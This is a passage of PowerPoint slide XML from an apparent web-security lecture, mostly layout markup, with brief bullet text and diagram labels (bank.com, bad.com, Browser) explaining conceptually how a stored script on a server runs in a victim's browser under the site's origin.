              <a:t>leaves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-815" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="581275" lvl="1" indent="-225664" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1240"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="73913"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="581910" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>later </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>unwittingly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sends </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it to your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="581275" lvl="1" indent="-225664" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="73913"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="581910" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>executes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" u="heavy" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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D45F4CD-9F1B-4E4F-9CFC-5A5CDD49C040}"/>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3603" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D87103F-59F7-EB44-8F58-A6364E25F8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="1598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3604" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F2DF15-1EAD-EC42-B62B-BC1A029E9005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{328C7838-A752-CF40-9388-C289AFAD1E6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00D026"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153606" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D044EDC6-827B-D146-BBC8-DAC78C5F9750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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3607" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3AB0903-0792-FB4F-8BA9-17E6E6A0D33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750"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 name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F725B77A-83FC-2D4E-859B-2DAC9D41170C}"/>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dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="178588">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bad.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs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F68A1B2-535A-834C-9F98-489274A84AB7}"/>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4627" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D851BE8B-A2F0-AE40-ADAA-91A1A6FCF42F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="1598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4628" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A1BC27-7083-F340-843B-3464B079387D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AC7B86-7444-9D45-806D-728B71ACB544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00D026"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154630" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98B0725-B9EC-3445-91E1-76C0AAF4E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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4631" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FAA44D8-70AE-0C48-A99D-D2521FB7F9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750"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 name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E86054-3428-7549-8ABB-C47FD90B79A1}"/>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54633" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207B901B-08FA-4E46-B529-E1B9EC404C2C}"/>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4634" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103C4CE0-11E0-D941-BF58-E6DA2DAD8872}"/>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4635" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF824C1-1125-5D43-9403-855DCBEFB70F}"/>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4636" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7CC906-2F46-1B47-AD4F-158F6723DB8B}"/>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D612268-30E0-2546-8D45-FE297CF2D0E9}"/>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5651" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D70F43-0FEF-8F4A-82BE-3375CF7A1A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="1598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5652" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662102EA-F586-CF4B-BA4B-DCC34D4563BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A95B12-CA53-2F44-8868-7106A57F2874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659908" y="5021992"/>
            <a:ext cx="1683112" cy="1518047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2176145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2176145" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA053C1-A15F-324C-A2F8-EE607F15BC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155657" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADED96B-A03F-C247-A006-8D71FB44CFF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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5658" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F74054F-F2C5-0541-90FF-357BB44C3989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750"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9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF333429-DE75-8C45-A43B-8F4A44DBB6B8}"/>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55660" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1903B3A-B77E-8845-A892-43D745C361AD}"/>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5661" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDD6C14-1185-FE41-8B02-9F4997BA7D6E}"/>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5662" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89CA553-5C20-4C4C-8C0C-482CA284C804}"/>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5663" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912E302C-6903-B14D-8507-C035EE145964}"/>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
        <p:nvSpPr>
          <p:cNvPr id="155664" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B49861-F589-694E-8E2D-F63CEFC47D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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5665" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B370EB-7B7C-434C-B0D7-2C30B0210DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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5666" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864F360F-01B6-FA4A-99E1-C04C44F79BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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744792A-7AFB-5A45-8630-AEE31366D1B7}"/>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6675" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C6455F-1155-744D-B3F6-24F056C1214C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1287463" y="3395663"/>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6676" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F32D5C9-21C8-2845-BC36-79FA0BCC0E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C9E680-2B92-924F-A9A8-0344FA407788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>
            <a:ext cx="1408113" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009CFD"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="8"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="277582">
              <a:spcBef>
                <a:spcPts val="4"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-8" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
